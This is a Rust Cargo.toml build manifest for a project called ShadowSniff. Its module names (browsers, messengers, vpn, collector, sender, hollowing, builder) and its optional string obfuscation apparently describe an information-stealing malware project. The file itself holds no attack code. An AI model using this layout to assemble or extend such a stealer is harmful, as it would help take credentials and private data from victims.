[package]
name = "ShadowSniff"
version = "2.2.0"
edition = "2024"
license-file = "LICENSE"

[features]
builder_build = ["obfstr"]
message_box_before_execution = []
message_box_after_execution = []

[workspace]
resolver = "3"
members = [
    "database",
    "ipinfo",
    "json",
    "requests",
    "shadowsniff",
    "shadowsniff/browsers",
    "shadowsniff/ftp",
    "shadowsniff/messengers",
    "shadowsniff/games",
    "shadowsniff/vpn",
    "tasks",
    "hollowing",
    "utils",
    "collector",
    "zip",
    "filesystem",
    "regedit",
    "sender",
    "builder"
]

[workspace.dependencies]
windows-sys = { version = "0.60.2", features = [
    "Win32_Foundation",
    "Win32_System_Console",
    "Win32_Storage_FileSystem",
    "Win32_System_Environment",
    "Win32_System_IO",
    "Win32_Security",
    "Win32_System_Com",
    "Win32_UI_Shell",
    "Win32_System_Threading",
    "Win32_Security_Cryptography",
    "Win32_System_Pipes",
    "Win32_System_SystemInformation",
    "Win32_System_Performance",
    "Win32_System_ProcessStatus",
    "Win32_System_LibraryLoader",
    "Win32_System_Diagnostics_Debug",
    "Win32_System_Kernel",
    "Win32_System_SystemServices",
    "Win32_System_WindowsProgramming",
    "Win32_Graphics_Gdi",
    "Win32_UI_WindowsAndMessaging",
    "Win32_System_DataExchange",
    "Win32_System_Registry",
    "Win32_System_Memory"
] }

[profile.release]
strip = true
opt-level = "z"
lto = true
codegen-units = 1
panic = "abort"

[profile.dev]
panic = "abort"

[dependencies]
windows-sys = { workspace = true }
shadowsniff = { path = "shadowsniff" }
tasks = { path = "tasks" }
utils = { path = "utils" }
ipinfo = { path = "ipinfo" }
collector = { path = "collector" }
zip = { path = "zip" }
filesystem = { path = "filesystem" }
sender = { path = "sender" }
rand_chacha = { version = "0.9.0", default-features = false }
rand_core = { version = "0.9.3", default-features = false }
cfg-if = "1.0.1"
obfstr = { version = "0.4.4", optional = true }